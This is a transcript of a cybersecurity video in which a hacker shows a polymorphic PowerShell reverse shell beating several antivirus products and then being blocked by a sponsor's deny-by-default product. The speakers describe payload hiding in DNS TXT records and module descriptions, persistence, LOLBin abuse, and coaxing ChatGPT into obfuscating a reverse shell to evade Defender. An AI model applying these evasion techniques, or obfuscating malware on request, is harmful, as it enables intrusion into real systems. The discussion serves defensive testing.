Can this Mind Blowing 🤯 Reverse Shell be stopped? (Powershell Hack)

David Bombal · Beginner · 🔐 Cybersecurity · 1y ago

Key Takeaways

The video discusses how to stop a mind-blowing reverse shell in PowerShell, using tools like ThreatLocker, CrowdStrike, Elastic and SentinelOne, and techniques such as behavior-based detection, ring fencing, and a zero trust model.

Full Transcript

So what we're going to go ahead and do is switch over to the malware box and then run the exact same command. And then up here, this is my actual local system: we're going to run the API call, pull down one of those reverse shells, that jumbled code that you just saw, and then just pipe it right into IEX and get it to run.

I have spoken to customers who have implemented similar solutions and I know what a pain it can be. I mean, I spoke to one organization who have spent, and this is not an exaggeration, four years on a project.

I just thought about something while you were talking. Have you guys ever dabbled with the concept of using, maybe this is dumb and crazy, but have you dabbled with the thought of using this as an anti-cheat for video games?

Everyone, it's David Bombal, back with the amazing Jakoby. Jakoby, great to have you back on the show.

I appreciate you, brother.

Hey dude, the thing that you showed us last time was insane. You've got to tell us what it was. I was blown away by it. We had so many amazing comments on YouTube about what you created.

Yeah, it's probably one of my favorite projects I've ever been a part of. It's a polymorphic reverse shell generator generator, technically, even though I said last time it was just a generator. A reverse shell is something that a hacker can run on a target system to gain control of it. Now, most of the shells that are out there, you can go and find them, and they get detected really easily, so a lot of the time it comes down to you having to make these modifications to get it through. It's a very slow, tedious process. I just managed to optimize it and streamline it and made a program that'll do it for me, on the spot, and then I turned it into an API so I can just do a single call up to it, and every single time I do, it'll generate a polymorphic reverse shell that has never been run before, so it won't match any known signatures or anything.

So you were saying that no antivirus was
able to pick it up, is that right?

So you want to be careful on the internet saying things like always and never, but at the same time, it's always worked and it had never been caught, up until recently. But yeah, so anyway, I developed a polymorphic reverse shell and then got a couple of different friends that had different setups with a bunch of different antiviruses, and I just had people reach out to me that had an environment they could run it on. So I ran it against CrowdStrike, Elastic, SentinelOne, obviously Defender, a handful of other smaller ones, and it just went through every single time.

And in that interview you did mention there was one company, right, that picked it up and blocked it. Is that correct?

Yeah, absolutely. So at the time they hadn't picked it up and blocked it yet, but it's someone that I'd been in communication with, and they had a really cool concept. And it's especially awesome because I had been getting frustrated, I know that's weird to say, but I'd actually been getting frustrated that I kept beating everyone, because it shouldn't be like that. And so I had been in contact with a company called ThreatLocker. I met a guy there named Ivan, who was a wonderful individual, helped me out with a few things, and we got to chatting and he started showing me some of what they were doing. So they do a lot of behavior-based detection and really stick to the zero trust model, as opposed to a lot of these other EDRs that will let something run, or scan it and then run something against the output and then block it after. But when it comes to something like a reverse shell, I only need one single command, and if I get to run it, you're already too late, I own the computer. So ThreatLocker does behavior-based detection, and they have a concept called ring fencing that they use, which is a way to track how different applications or different processes communicate with each other, and if I remember
correctly, I believe it stays on your system for about 30 to 60 days and studies the behavior of the user to create a baseline for whatever company or individual it is, and then they use that to find outliers in behaviors that aren't normal, and they go ahead and block them in advance before they allow some sort of infection to take place.

Last time we spoke you had a sad story, and I think it's important that we highlight this again. You are an ethical hacker, you're not a black hat, and companies should be glad that someone like you is really testing their systems. And like you just said now, you were kind of disappointed that this wasn't getting picked up, because we want to protect companies, we want to help them better protect themselves. It was fantastic that ThreatLocker picked this up, so at least someone was picking it up. I have to say, this video is sponsored by ThreatLocker, and I've asked ThreatLocker to come on and answer some questions, and we'll see who wins. Will red team win today, or will blue team win today? Red team versus blue team. But before we get there, do you want to say anything else, or do you want to demonstrate this hack and perhaps how it got blocked?

Jakoby versus machine, with ThreatLocker. I'll go and give you a demo on my main system. This will be the system that does not have ThreatLocker, without any sort of detection, so you can just see how quickly and easily this can be run. And there are of course a lot of different ways to implement it; we're going to stick to basics here just to get the concept across. But I literally just have an API endpoint where I can pass up an IP and a port, and then a key, which I will be changing after the video for sure. But this is a simple one-liner that is going to call up to my API, and then it spits out a reverse shell that is heavily obfuscated. And this took a decent amount of work, because it's not as easy as just simply obfuscating it,
because there are a lot of different detection methods for this that different EDRs and AVs use to try to find it, whether it be looking for certain keywords. Like, you can't have "reverse shell" inside one of these; the words "reverse shell" will get it knocked, that's an obvious one. But there are a lot of other little things that they look for, or don't look for. And even one thing I found out is, if you obfuscate it too much it gets detected, even by Defender, which is like the low end. It is too unhuman-readable, and even Defender will block it, although I've beaten CrowdStrike, Elastic, SentinelOne, whatever. So you'll see inside of here, a lot of times I'll use something like four files as the human-readable characters, but essentially just little things like that, leaving just a little bit of human-readable code, will get it past certain things. So this was a significant amount of trial and error towards the beginning.

So what we're going to do is go ahead and turn on our netcat listener on our intermediary box.

So that box at the bottom right, sorry to interrupt, is that somewhere in the cloud, perhaps, and then the device at the top is the device that's getting hacked? Is that correct?

Yes, absolutely. So what a lot of us hackers do is we'll have a jump box in between ourselves and the target, just as an extra little proxy. In this case I have a jump box that connects to the target system and calls back to a separate box, so I have two of them that are hosted: one's the jump box, one's the actual API itself. You want to try to keep as much segregation as possible. But what we're going to do is we're just turning on the listener for our jump box that we'll be using to catch the shell, and then up here, this is my actual local system, we're going to run the API call, pull down one of those reverse shells, that jumbled code that you just saw, and then just pipe it right into IEX and get it to run.

Oh, that's awesome.

And you'll see down here we
have "connection received". A funny little thing I did on my computer: a lot of hackers, the first thing they'll run is the whoami command. You can actually reassign that function so it doesn't spit out what it's supposed to, which is what I did. So now, any time someone tries to run it, it just says "I am the ghost in the machine". That's not the name of my computer or my username. Little fun tidbit. But yeah, we can just pop open the calculator real quick, and you'll see this is on my PC. Hackers use calculator just to test that stuff works. So yeah, as of right now I have control of my main system. You just go and hit clear screen up there, whatever, and we can Ctrl-C out of that, and you see the connection has been cut. But as long as that connection is there, I have full control over the PC. And then in my repository, my personal repository, I have a lot of different persistence methods. Really, all that API call has to do is be run every single time the computer's turned on, whether you want to put it into a startup folder, sneak it into their PowerShell profile, some DLL sideloading, whatever it is. It doesn't really matter, as long as you can get that single one-liner to run every time the computer starts. Again, it'll generate a brand new polymorphic reverse shell, so it'll be different than the shell that was run last time, and every single signature is unique; none of them will ever be the same as any other shell that's run. I've been working on this for like two and a half years, slightly on and off, making little fixes here, taking suggestions from the community, running it past some friends.

So what we're going to go ahead and do is switch over to the malware box. Jakoby versus ThreatLocker. And then we're going to go ahead and run the exact same command and pipe it into IEX, and you'll see "unable to connect to the remote server". This shows a simple block. There are other ways to also get this shell onto a system, so I
want to show that they're not actually just blocking the API, because anybody can simply block an API if you know what the website is, and that's really simple. I don't want to say there's nothing special about that, but once this website gets out, it's obviously going to be blacklisted everywhere, so that isn't much of a mitigation in itself. So I have a bunch of other methods that I can also use. So for example, what we're going to do...

Just before you do that, sorry Jakoby to interrupt again, because I'm slow, right, I'm the boomer, so I'm slow. That box, the red one, the second one that you've just run the command on, how is that different to what you just showed us? Is this running ThreatLocker?

Yes, absolutely. So right now the red box that you see right here is my junk malware laptop that I've put some heat onto, and I went ahead and cleared it out, wiped it completely, and then connected with the ThreatLocker team. And the implementation to get ThreatLocker running on the system was so much simpler than I thought it was going to be. I actually haven't even brought that up to you guys. It was actually impressive how quickly and easily it was to implement.

Impressive, very nice.

Like, shockingly, it almost feels like they shelled me, I'm not even going to lie. So the setup was absolutely brilliant. So yeah, this is just an extra laptop, we've got ThreatLocker running on it right now. And so again, I want to show that they're not just doing something simple like a DNS block, right? I have a bunch of other techniques, and some of them I'm actually not going to share today because they're that secret, but I'll pop a couple of them out.

Great, because the last time you did that DNS bouncing thing, man, that was crazy.

Yeah, the data bouncing was absolutely brilliant. I'll have to talk to these guys at some point. I haven't got to test that with them, but I'm curious to know how that would work as well,
actually, because that is the single best data exfiltration method that has ever existed, or probably ever will, until somebody invents teleportation, where you steal it on USB and teleport that USB drive. That would beat data bouncing. If you guys want to Google that, it is the coolest data exfiltration method in existence, period, hands down, without a doubt.

Just for everyone watching, I've put a link to our previous video where Jakoby goes through this in a lot of detail. I mean, it's really insane what he did, so I highly recommend that you go and look at that. I often get comments on YouTube like, "David, this stuff isn't real world, this stuff is too simple", so if you want to really see hardcore, crazy hacking, go and look at that video. It's really impressive. I think, Jakoby, that ThreatLocker blocking this, because if they can block you, that means a lot of companies are going to be a lot safer. It's honestly impressive.

Impressive, very nice. And so again I want to highlight that they're not just doing some basic DNS block of my website API, so there's a bunch of different methods for this. So again, what we're going to do is I'm going to switch back to my main system just to show you something. So we'll go ahead and run this one more time just to show it generated. So obviously every single time I run this it generates a brand new one that has never been run before. So using the API is how you get a fresh new one every single time, on the spot. But if the API itself is blocked, and again, you could make proxies to send this to another one so it's a different website that pulls it, and that might be something I look into in the future, but you can also just simply copy and paste this reverse shell and put it somewhere and pull it down. Like a lot of my ducky script payloads that I got known for is me just hosting a payload on GitHub and using something like Invoke-RestMethod or Invoke-WebRequest to pull it down and execute it. So you can still do
that as well. One of the sneakiest techniques that I've ever seen, and it honestly changed the trajectory of how I write some of my malware: there's a guy on Twitter, his name is Aled, and I want to say almost a year and a half, two years ago, he just randomly decided to share with the world that you can use DNS TXT records to store different strings, or in this case malware samples, that you can pull down. And what's really cool about that is a lot of systems like to look at the use of things like Invoke-WebRequest and Invoke-RestMethod, and if that's going someplace that's not good then they'll block it, or a lot of those sometimes are even, I don't want to say blocked by default, but they're nerfed to the ground. So he pointed out that instead of using either one of those, you can actually use Resolve-DnsName to go to a TXT DNS record; it'll pull the type down, it's text. So this part I'll actually do without doing that: if you run it just like this, you'll see the malware sample right here. So this is the DNS TXT record itself; it shows it's a TXT, blah blah blah, and then the strings, what it does. DNS TXT records are typically supposed to be, I want to say the limit was 255 characters, but there's a different way that you can pull them down where it'll just split your string into 255 characters for you. And if you saw the full command that I was just running there, at the end we're going to pipe it, for each of the strings, and join them, and here it is, the reverse shell again. Now, this one is not dynamic, it's not technically polymorphic. It is the output of the polymorphic reverse shell in itself, but the code itself is not polymorphic; every time I run Resolve-DnsName it's going to pull down this exact one. So that is a slight weakness, if you want to call it that, so it might not be the persistence method that you use per se. But we're going to go back over to our malware box.

No, just wanted to ask another question, because I'm sure the
audience want to know this. You said this is a laptop, right? So this is a physical box?

Yes, absolutely. Yeah, I have them both in front of me right now. I'm just using a capture card to pull the screen over.

So you've got two physical boxes. One is the one that's running ThreatLocker; the other one is running just like Windows Defender or something, and you're just bypassing that all the time, but here you're perhaps struggling, correct?

Correct. Well, to be fair, I have another antivirus on that one, it's just disabled for this video.

Okay.

But even if it was on, it would walk right through it. But there are some other things that it kind of sometimes messes up, some of these other methods, that I just wanted to be clear on. So we did pull that down here. So we're going to go down to Resolve-DnsName again. So I noticed that when we do the Resolve-DnsName I can actually pull it down, so you see that we're on the ThreatLocker box, I am able to pull the string down. But if we go to run it, however, by piping it into IEX, Invoke-Expression, it will spit out all these errors that you see here.

And that's PowerShell run, correct?

Correct, yeah. So if you see right here at the top: "exception calling with two arguments, no connection could be made". I got a more verbose error message the first time when I was running it off stream, but essentially it said ThreatLocker had refused to allow it to connect because it was not an authorized attempt to access one of the sockets that I was using. Okay, so it's looking like it's actually feeding that error through; really quick, it clears the screen and then shows that the connection is not allowed to be made. They're blocking my connection to the site. But again, keeping in mind that since we're not doing an API call right now, this isn't actually going to my API at all, this is going straight to the jump box, where they're refusing the connection from inside, which, they're literally the first
people to do that.

It feels good and bad. It feels bad that you couldn't pop it and take control, right, but I think for all of the defenders it's the best news ever.

Yeah, yeah, there's a lot of emotions in that one. It's good, well, not good that I finally got defeated, but it's also awesome that these guys took the time to take it seriously, because, I don't know if you, for some of the people that have been following me, if you saw some of the bounties that I turned in last year...

Exactly.

I got royally screwed over. And a lot of the vulnerabilities are still there; some of them they haven't deemed high enough, and then a couple of times they've gone through and made a couple of changes behind my back. But the thing is, the problem with the changes that they made, since they didn't consult me, it took me all of about six minutes to just slightly change up what I was doing and fix what they did. Like one of the times, I'll say for hypothetical, easier-to-illustrate purposes, in order for them to beat my reverse shell, what they were doing is they were adding an invisible Punjabi character at the end of my string. So one of the other methods you can use, instead of pulling from DNS TXT records, you can pull it from the description of PowerShell modules, because PowerShell modules are accessible to all things. So what you can do, let me switch back to this one, we'll do a cls, we'll do Find-Module, fimo for short, we'll do C2 (there shouldn't be a module called C2, by the way, but here we are), we'll grab the description, and it should just say "this is an example", something along those lines. Oh yeah, except this is in base64, because malware.

You can read that in your head? Man, you're living in the Matrix, unlike us normal people.

There's a couple of them that I have absolutely memorized. "Start calc", this is a side, I think I'm going to get that tattooed on me. "Start
calc" in base64, just because that's always my test, a basic string that's completely random. But so you can put malware in the description of PowerShell modules. You're not necessarily supposed to be able to access the code that's inside of them without doing Import-Module, going through the UAC, and then there's other processes, corporate policies, that might stop certain things. Absolutely nothing stops you from querying the description of a PowerShell module, and you can fit a lot in there, or you can combine them. So I put a reverse shell in the description of the module, but I noticed one of the fixes they tried to do, to nerf me from doing this again, is they put an invisible Punjabi character at the end of the string of all the descriptions of every PowerShell module. So you pull it down and try to run it, it'll error out, but that's a simple regex expression to get rid of any characters that aren't, you know, ASCII. So I added an extra like 13 characters to my one-liner, kept it under 259 characters so it still fits in this Run box down here, which also, just randomly, they nerfed me here too. If you guys know all of my ducky script payloads, everything, like I said, it's all about hosting the payload up here, using Invoke-RestMethod to pull it down and then execute it, which I did from the Run box with the Rubber Ducky, because you just hit Windows+R, type it in, and it opens up and runs it without the window popping open. What they did is they made the Run box work with PowerShell version 2 now instead, which doesn't have access to Invoke-RestMethod or Invoke-WebRequest. So when I run this it's going to say, "sorry, it's been deprecated, we're running PowerShell 2.0". So they actually nerfed all of my payloads. But the little mitigation processes that companies like this try, without actually consulting someone like me, it's a joke. So for someone like ThreatLocker to finally reach out, for us to have the
communication to go back and forth, and then for me to finally get on to one of their systems where I could test with their software and get beat, it was so bittersweet. But it was still sweet.

ThreatLocker wins. The thing is, you've made the world a safer place, dude. There's huge kudos for doing that.

Can we go back to, you had mentioned that the first time you ran the commands on your machine there was a more detailed error message. If you go into the agent in the system tray on that machine, you should be able to reset the history, and then if you try it again, hopefully the first error will pop up again.

I just go "reset history", you're saying, right here?

Yeah, that's the one.

I'm curious to hear how you would go about implementing a procedure to block the DNS bouncing of data. I am not even going to lie to you, I don't think it's possible, because, okay, it was one thing when it was data bouncing, but then I found out that I could use the Google DNS lookup servers. Like, you can go to dns.com and you can use it to query DNS records, right? So I'm actually using Google to do it for me. So I really just don't know how people would block that. I'm not even going to lie, that's why I was so curious to see what kind of implementation you guys might be able to try to pull off. This we can do testing with; we shared some information.

We might, with ring fencing, like we can block PowerShell from the internet. I was going to say, I have a suspicion, I might know what's happening when you tried to do that the first time, Jakoby, which is, obviously with ring fencing we're controlling what PowerShell can do, where it can go, where it can connect to on the internet. From my experience playing with it, specifically with reverse shells, the initial connection outwards from PowerShell to your reverse shell server, the actual connection itself, is actually permitted. As soon as so much as a byte of
data it tries to transmit, it's then blocked. So I think that little sort of glitch that you saw, where it looked like it was connected but then it didn't, it was because as soon as data was transferred...

Correct.

I saw that before myself with a piece of malware, PowerShell malware, that we came across, and it looked to me for all the world like I'd get the connection on the netcat listener and I'm going, oh my God, this thing is after bypassing ring fencing. But when I actually tried to do anything, i.e. press return or do anything that involved data going back and forth, the connection was immediately closed. So I suspect that might explain what you're seeing.

Yeah, that's actually exactly what happened. I got connection, and then I always do "start calc", that's just the thing. Once you type anything, it disconnects.

Connection was immediately dropped.

Was immediately dropped. That explains it. I was actually caught off guard. I was like, yep, I got you, you thought you bypassed ThreatLocker. So yeah, I messaged him immediately, I was like, well played, well played.

Just to confirm, we didn't need to do anything. We didn't need to configure anything, set anything up, tweak anything, adjust anything, block anything when we saw it happening. It's purely because we control where PowerShell can go on the internet. Basically, as you said earlier on, we block by default, so it's not as if we had to adjust for your behavior, or we had to block a particular location, none of that. It's just we say PowerShell should not be allowed to access the entire internet, so we don't allow it to access the entire internet except what is whitelisted.

Exactly. So deny by default, permit by exception, which again is absolutely brilliant. People really underestimate the strength of PowerShell. They think that because it's not as robust of a language and, quote unquote, you can't do as much, that it's somehow inferior to the other programming languages that people use for malware. But there's two very
there's two very important things. One, I'm going to let you in on a secret, I know it's going to be in the video, but if you guys tell anyone I'm going to be so mad, I'm just kidding. I use some Python on my malware server where the API is done, not for this particular project, but I have other things that I'm working on where I do use some other languages. And the thing is, it doesn't matter, because it's all done server-side over there and I'm just using PowerShell to collect whatever I need afterwards. So I can still use other languages elsewhere. The thing is, if you're doing malware development, in my opinion you should always be using PowerShell. For you guys that don't know what that is, it's just a living-off-the-land binary, meaning that you don't have to download any third-party anything to make it work. You don't have to convert this to an exe and then try to get the exe past because you made it look like a picture, even though that's fun, but you just don't have to. It's just extra. So PowerShell, the way that I try to explain it to people, like the difference between PowerShell on the local system and C: C is so heavily looked after and monitored, and all the processes, it's seen as an attacker, whereas PowerShell itself is more so seen as the bodyguard or the bouncer that's outside of a club, that's like, hey, you can get in, you can't get in. And it's usually as simple as that, a binary yes or no, you can get in, you cannot, and all I need is the yes. Everything else is done server-side and I can do a simple API call with PowerShell and do whatever I want. So that's something that nobody else really, I'm not going to lie, nobody else really takes seriously. They're like, oh, it's just PowerShell. It's like, it's all that I need.

Could I wager that most attackers take it pretty seriously?

Exactly, yeah.

Even if a lot of defenders don't. I mean, I saw statistics that something like 90% of ransomware attacks will use PowerShell at some point in their execution. It might be running remote code, it might be downloading payloads and running them. I don't know if you guys are familiar with, so as you may have guessed from my thick Michigan accent, I'm not from around these parts, I'm from Ireland, and the Irish health service, the HSE, was wiped out back in 2021 by a ransomware attack. But they did a fairly detailed analysis of what had happened, and it all started with a malformed Excel document, basically, that opened PowerShell. PowerShell deployed the Cobalt Strike beacon, basically doing what you're showing, for all intents and purposes. But as part of the breakdown, PowerShell was used at about five different stages of that attack. So they used it to, as I said, deploy the Cobalt Strike beacon, they used it to delete shadow copies, they used it to download and execute the payload. So five different stages of that complex attack involved PowerShell. And as you said, Jakoby, it makes perfect sense to use it, because it's on every Windows computer and you can do so much with it. It's one of the things that we try and tell people about all the time. One of our taglines, by the way, is "stop PowerShell from eating your lunch".

Why are you trying to eat my lunch? Because that's brilliant. Yeah, it's so easy to weaponize. As I've been trying to get more involved with different communities, a lot of the friends that I've been making recently, they're not even hackers. The PowerShell community is strong and there are a lot of people that do some amazing things, and I've done a couple of demos with them and just showed off what I'm doing with PowerShell. It was so crazy to be in a room with multiple Microsoft MVPs and demo something, and then at the end of it, I watched jaws drop. The questions I was getting asked, the things people were saying, "oh my God, I didn't know you could do that, I never really thought about this, it's always just been, for administrators, to rename files or batch
this or that." And even some of the best, that was when it really hit me, I was like, yo, you're on to something here, with all these Microsoft MVPs, who are not necessarily in security, but they find bugs all the time and they report them. They just don't actually know the full scope of what they just reported, you know what I mean? So a lot of these guys, I'll study some of the work that they do, the bugs that they turn in or the little techniques that they have, and it's like, do you have any idea what you've just done? I know that you're such a good person that you can't even imagine how that can be used wrong, but you just made a whole C2 platform and you think it's for controlling OBS. But guess what, now every single streamer out there is vulnerable, because you streamlined the entire process of controlling OBS, getting their keys, everything. You streamlined the whole process, and control it with PowerShell. I turn it into a little module. I literally have a PowerShell module to make other PowerShell modules malicious, like sub-modules, just to add slightly more functionality to them so I can use them in a way you absolutely never intended. And yeah, it's crazy what's out there. But seeing, again, all those Microsoft MVPs, they're geniuses, they are so much smarter than me. It's crazy for me to sit in front of some of these guys and I'm like, oh my God, I'm a fraud, they're so smart.

You're amazing, dude. That's why I wanted to have you back on the channel, right? Because if a company can block you, then it shows that they're doing something right.

So yeah, if we go back to here. I've gone like an extra mile, and so I haven't had to do any of this stuff, so again, based off all the testing I've done before with all of these different antiviruses. If you look up here, it shows API v1; I'm on version four, this is the public one, you know what I mean? But
what we're going to do is, after key right here, we're going to do an E for encoding equals. I can do B, we'll get it in base64. And then it's stackable, so whereas I could do just this one, or we'll do zero, so you'll see it, you can do it in binary, get the output in binary. But again, these are stackable, so I can do like a base64, then reverse it, put it in binary. So again, it'll be here, that will do a shift right, so then we'll shift every single character up two, so it'll be twos and threes, right? I just have this for now. It's X for AES encryption as well. Now the AES encryption itself is hardcoded; typically you'll want to be able to pass your key in right here or whatever, you know what I mean, but for my testing purposes on V1, now it's AES encrypted. And then we can go even a step further, and this is where there's going to be a lot more experimentation, and hopefully I can continue to work with ThreatLocker, because listen, listen, when you guys slapped me down this morning, listen, I'm not going to lie, I'm happy for you, but I'm coming for you, like I'm coming for you. And so we'll do L at the end here, and this one's going to take like four or five seconds because it's going to do all that and then spit it out as shellcode. Now once it's in shellcode we can do DLL side loading, process injection, I mean there's an insane amount of other options. Again, I'm not sure if this will make it into the video per se, but we're going to import this module. LOLBin, show modules. This is a module that I made that is working based off of the website, the LOLBAS project. Those guys, they're my heroes, they're so smart. So I go on there, pull open, yes, okay, so we're going to grab all three of these, copy, we'll paste this over, and then we'll do existing LOLBin paths, actually all. x, c, because I'm lazy. Yes, I made an alias for clear screen so it's just c. And then we'll go to the existing LOLBin paths, and these are all the different LOLBins that were found on this system. So every
single one of these can probably be exploited in some way or another. You know, obviously you just saw, like, mshta gets detected a lot, but there are a lot of them in here that I can use for different implementation methods for getting the reverse shell string onto the system, or, you know, having to go through shellcode or whatever else. So ideally there might be some more advanced demos later highlighting some of these.

So just to explain, Jacob, you mentioned at the beginning about sort of behavior-based detection. That's part of what we do, but it's not all of what we do. The main thrust of our product is around control, so it's basically a set of rules. Now there's a few different aspects to it. You've obviously pointed out ring fencing, which is fundamentally a control; it's about allowing applications to do what they need to do and no more. We also have an allow listing component, so allow listing again is a control: it's what can run or what can't run. Obviously it's going to stop not just bad things like malware or ransomware from running, but also good things that can be misused, so your WinRARs and 7-Zips and, you know, remote access tools, AnyDesks, things like that, things that are not necessarily bad but that can be weaponized and misused. But again, we've got other control components as well around networking, we've got controls around storage data, you know, what programs can access what data. But most of what's been blocking you, most of what's been frustrating you, is not because we've detected you doing bad stuff. Most of what's been blocking and frustrating you is because we fundamentally deny by default. So as I said, what can run or what can't run, but also behaviors. So there's no... I don't want to say there's no detection required. We do have a detection component as well, which is ThreatLocker Detect, this one, the Detect team on the call with us here. We are seeing that you're trying to do these things, but again
we're seeing you're trying to do these things whilst they're being blocked. As you correctly pointed out, there's very little point in detecting after something has happened, because it's probably going to be too late. So what we're doing is blocking first and basically detecting second.

Which is cool, absolutely, which is exceptionally cool for two more reasons. So one, of course, you're doing advanced mitigation, but you're also following something that was pounded into us in the military, which is the anagram PACE. Like, you are not prepared unless you follow PACE: you need a primary plan, an alternate plan, a contingency plan and an emergency plan. So while there is detection, it's not necessarily the main thing that's being used, but it is the alternate plan, and then there's a contingency plan, and then an emergency plan. But again, the coolest thing, and this actually works out well, PACE, P: you guys are being preemptive. That is the big difference, right? A lot of other people, they do follow PACE actually, and good for them; it's just that P doesn't stand for preemptive for them, it's just primary. So that's pretty cool. But what you were saying about blocking a bunch of other systems like AnyDesk and any other software that could be used: again, something you guys should for sure look into is the LOLBAS project, because that's literally what all of these are. So while you guys do block things like maybe PowerShell or such, Pester, for example, has a way of using PowerShell from inside of Pester, and in the process it will show it as being Pester unless you go like three deep in, like, Procmon or something. You know, you'd have to go three instances deep before you even see that it's calling PowerShell. Now I lied about Pester, because that one's actually only two deep, let's be okay, actually I should have, yeah, clarification. But there are some of these other ones that do also call PowerShell, but the process is so
deep, like three or four, because it's like their first call, and then they call into Pester, and then Pester calls a process that then calls PowerShell. So sometimes when it's nested a little bit further, those processes don't get caught. Now I don't want to speak for you guys, you know, right, you know what I'm saying, but you guys are the only ones so far that I've heard that have something implemented that's looking for this level of integration, like that deep, so that's pretty cool.

We'd love to see that on a machine running ThreatLocker, and certainly something we'd love to explore with you. Just on the subject of LOLBins, by the way, so obviously it's something we're very much aware of, and, you know, preventing weaponization of trusted software is almost as important as what can run or what can't run. So we've got a bunch of default ring fencing policies, I think about 23 or 24 default ring fencing policies, that every new group of machines will get. So it's everything from PowerShell to curl to regsvr32 to rundll32, basically the same principle as with PowerShell: just controlling what they can get, what they can do, where they...

Forfiles! That exact list that you just started naming off, that one's right in there. Yeah, forfiles has been like my go-to for the last couple of years. That's probably the first one that I try. It's like the first one that's just off of the list of normal ones checked, like how you just listed four of them and you technically left off forfiles. You're aware of it, but that's also one that a lot of other people leave off, specifically using forfiles to call and execute or, you know, whatever else.

So as I said, we didn't have to respond to anything Jacob was doing. We didn't have to change anything specifically for him. It is a relatively typical setup that he's working inside. We did add some policies, so we have a standard set of, I think it's about 40 policies in total, that
you know, any new group of computers, a group of workstations, will get. We did add a few extra ones, which are basically Microsoft recommended ones. So basically Microsoft had a list of things that they recommend you should block to harden your environment, so things like WSL, that kind of stuff. Now I know Jacob hasn't used any of them in this demonstration, but we did sprinkle a little bit of those recommended policies on top of the default set, and we did tighten up on networking as well. Again, not specifically relevant to what Jacob has been doing or using, but we did add some network control policies just in case he did manage to do something that, you know, bypassed our controls, which thankfully he hasn't so far.

Yeah, I mean, Jacob, is that white flag time for you, right, or are you gonna come back with vengeance?

Oh, the gauntlet has been thrown down. You know, like, here's the thing. Like I was showing you guys earlier when I was doing all the testing with all the different antiviruses, one of the things that made me the most frustrated is how much I worked on this project before I decided to start doing that level of testing, because by then I had already implemented a bunch of the other different implementation methods, including the extra encodings and the reverse strings, the shifting, the AES encryption, shellcode. I did all of that and I was so excited, and I started getting onto these systems to test them, and I was like, I can't wait to, you know, try out all this stuff that I spent hundreds of hours working on, and then I beat them without ever going past stage one, and honestly that part was frustrating. So the fact that you guys beat stage one, like, I have been waiting for this. I have been... I'm not saying I'm gonna make an example out of you. Can I... no, no, it's just, you guys are brilliant though, it's great.

Can I share something with you that I think you'll appreciate or enjoy? So if we categorize everything you
have done or been doing or trying to do as the genius way to do it, I'm now going to explain the dumbass way to do it as well, which amazingly enough is just as effective. So you obviously know a bunch of PowerShell, you know a bunch of coding. I don't know either of those things, right? So what I did, and it's one of the demonstrations that we do, is I went on to revshells.com, picked the PowerShell method, yeah, it gives me the PowerShell code. So you put that into a machine running Defender and immediately it gets gobbled up, so it's known malware basically; it says, you know, this is a malicious script, you can't run it. So I went to ChatGPT, pasted the PowerShell command in there, and I said, can you obfuscate this please? So it obfuscated it a little bit. So I said, can you obfuscate it a little bit more please? So it obfuscated it a little bit more. We went back and forth for a while, so I tried to run that and it failed, and then I tried to run it again and Defender picked it up as malware again. I said, your obfuscation isn't good, it's just been picked up as malware, and we went back and forth, and eventually I basically said, look, you know, there's 15 errors on that, are you even a computer? So at the end it spat out an obfuscated version of this piece of code that I got from revshells.com that does not get picked up by Defender and functions absolutely perfectly as a reverse shell. So while what you're doing is brilliant, what I'm doing is the exact opposite but is equally effective. Well, sorry, maybe not equally effective, but sometimes.

And kind of as a... so check this out, I've already streamlined exactly what you just said. So two things. One, the website that you're talking about is made by Ryan Montgomery, or 0day as he goes by on Twitter. He's a good dude, it's awesome. So he made revshells.com. And then I was telling you about the different PowerShell guys and how they create things all the time and they're like, they don't fully understand what they've done. I
made a submodule for a module that Doug Finke, he's one of the PowerShell guys, he's probably hands down top two smartest PowerShell guys in existence, he's the one that made the module PSAI, which is so you can get access to, you know, AI through the PowerShell console. So I made a submodule for his PSAI literally just to generate reverse shells, to do exactly what you just said. And the only thing is, like, the training that you have to go through, it gets to be a little annoying, because the main thing is ChatGPT always likes to make things verbose and try to make things clear and legible, so it likes to use words that make you understand what it's doing, so it likes to randomly name the function "reverse shell" or something along those lines, and it gets picked up, and that's where it's getting busted. So it took a while to even come up with a prompt that could get it close. It's never been proficient or reliable enough for me to use it regularly, I guess. But no, 100%, if someone out there can sit down and engineer the perfect prompt, we'll go ahead and call it the prompt father. If you see this video, I'm talking to you: if one of you guys can engineer a prompt that's good enough to obfuscate it, but not enough so it's not human legible, but also gets blocked by the small things, while also taking out keywords like rev shell, reverse connection, anything like that, there's a bunch of those, you can find them pretty easily. Which, if you guys don't know how bad Defender is, this is something funny that I did. I posted it as a Twitter status just because I thought it was funny, but I literally made a function called like "reverse shell" and then ran it in the console and it doesn't work. I just changed the name of the function to not "reverse shell" and it works. So like, that is how lenient the linguistics are when it comes to the system. They really do have it hardcoded. It's not even
like it's a slightly regex, you know, form-fitting anything that's roughly here. No, it was literally like you can't name it "reverse shell", or maybe it might have been "rev shell". That's when, how often, yeah, this is just Windows Defender right now.

And so what you're saying is Windows Defender just can't pick up even the most basic stuff, it seems?

Okay, no, so even that one works, but one of them got detected. I found the exact one; it's some form of reverse shell, but it got detected. I just named it not that and it goes through. So yeah, if anybody wants to take that challenge and see if they can get ChatGPT, through the API, through Doug Finke's module, yeah, you can get a whole polymorphic reverse shell generator just like that; it just might not be consistent per se. Yeah.

Oh, but there's more as well, because I made sure to prep it to go all doomsday in case somehow you did manage to get a shell. Because even if you do semi-manage to get it, well, the idea was even if you have a connection, we're going to make sure that it's very, very difficult for you to do anything. So if you were to try to, say, read a file in like your Documents or your Desktop, and you can even try on your machine right now, you shouldn't be able to see what's inside those folders. This was a challenge I gave to a local college cybersecurity team. I gave them a box of Damn Vulnerable Web App and made sure the settings on it were as easy as possible, and then took off things like Defender, I took off other security measures, and only had ThreatLocker on it. They were able to get in, and I blame them, when I was doing new testing I couldn't get in. They had a flag on the desktop, and all they had to do to win was read off the contents in that flag text file on the desktop. They couldn't do it. There's no way they were able to read it. And that being said, if they were on the physical machine you could just open it with Notepad, it'd have been fine. Oh yes, that's blocked as a whole, so
I can't programmatically make it; if you open up something like Notepad you could do it in there. Yeah, that's what we're about to do, but make one this way. Do "test cookies", that's my test string for everything I do. Get-Content this up by search prois... oh, that's even for that? That I don't know. No, there's no way you guys caught that, that was autocomplete. That got... yeah, that was autocomplete, makes sense actually. Yeah, that got rocked. Yep, so even if I did get the reverse shell onto the system, again, I think you guys, and you can give clarification, I mentioned this earlier, I think you guys said you have this software on the individual corporate system for like 30 to 60 days to study behaviors?

It doesn't take 30 to 60 days. In most environments it's a week, maybe at most 10 days for us.

I'm not sure why I had that number in there, but yeah.

